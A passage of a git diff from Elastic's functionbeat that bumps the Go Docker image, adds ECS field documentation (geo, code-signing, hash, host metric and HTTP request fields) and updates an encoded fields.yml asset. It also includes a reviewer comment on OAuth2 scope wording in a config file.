b/x-pack/functionbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/x-pack/functionbeat/docs/fields.asciidoc b/x-pack/functionbeat/docs/fields.asciidoc index 5cc8da65133..59232d4e114 100644 --- a/x-pack/functionbeat/docs/fields.asciidoc +++ b/x-pack/functionbeat/docs/fields.asciidoc @@ -88,6 +88,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields 
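Review bot: The comment added above `var.oauth2.scopes` in the microsoft.yml.disabled hunk ("Related scopes, default should be included") does not say which default is meant or what fails without it. The same hunk moves `var.oauth2.token_url` to the `/oauth2/v2.0/token` endpoint, which is requested with a scope list rather than the v1 resource parameter, so an operator who overrides the list and drops the `.default` entry will most likely see token requests rejected. I would word it as `# OAuth2 scopes requested with the token; keep the API's ".default" scope when overriding this list`. Whether the module supplies this scope itself when the setting stays commented out is not visible in this hunk, so that is worth confirming and stating in the comment as well.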
@@ -473,6 +482,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -530,6 +550,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -552,6 +584,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- @@ -565,9 +608,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -882,6 +928,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -899,6 +957,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- 
@@ -922,6 +992,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -1088,6 +1170,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -1145,6 +1238,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- @@ -1167,6 +1272,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -1180,9 +1296,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -1401,6 +1520,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- 
@@ -1424,6 +1555,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -1484,6 +1627,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -2229,6 +2381,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- @@ -2252,6 +2416,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -2400,6 +2576,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -2890,6 +3075,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -2947,6 +3143,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- 
@@ -2969,6 +3177,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -3006,8 +3225,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -3046,6 +3266,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host @@ -3064,6 +3293,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -3087,6 +3345,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- 
@@ -3144,6 +3413,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -3166,6 +3447,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -3199,10 +3491,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: @@ -3215,6 +3510,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- 
@@ -3492,6 +3823,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -4025,7 +4368,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4089,7 +4432,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4108,6 +4451,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -4165,6 +4519,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- 
@@ -4187,6 +4553,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -4199,7 +4576,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object @@ -4263,7 +4640,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -4283,10 +4660,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -4856,6 +5236,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- 
@@ -4879,6 +5271,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -5001,6 +5405,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- @@ -5055,6 +5468,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -5078,6 +5503,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -5200,6 +5637,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -5938,6 +6384,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -5995,6 +6452,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- 
@@ -6017,6 +6486,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- @@ -6030,9 +6510,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -6400,6 +6883,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -6457,6 +6951,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -6479,6 +6985,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -6492,9 +7009,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/x-pack/functionbeat/docs/overview.asciidoc b/x-pack/functionbeat/docs/overview.asciidoc index 685a9910253..132028d3b36 100644 --- a/x-pack/functionbeat/docs/overview.asciidoc +++ b/x-pack/functionbeat/docs/overview.asciidoc 
@@ -2,7 +2,7 @@ [role="xpack"] == {beatname_uc} overview -{beatname_uc} is an Elastic https://www.elastic.co/products/beats[Beat] that you +{beatname_uc} is an Elastic https://www.elastic.co/beats[Beat] that you deploy as a function in your serverless environment to collect data from cloud services and ship it to the {stack}. diff --git a/x-pack/functionbeat/include/fields.go b/x-pack/functionbeat/include/fields.go index ede9ab3220d..095643ff7f0 100644 --- a/x-pack/functionbeat/include/fields.go +++ b/x-pack/functionbeat/include/fields.go 
@@ -19,5 +19,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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" + return "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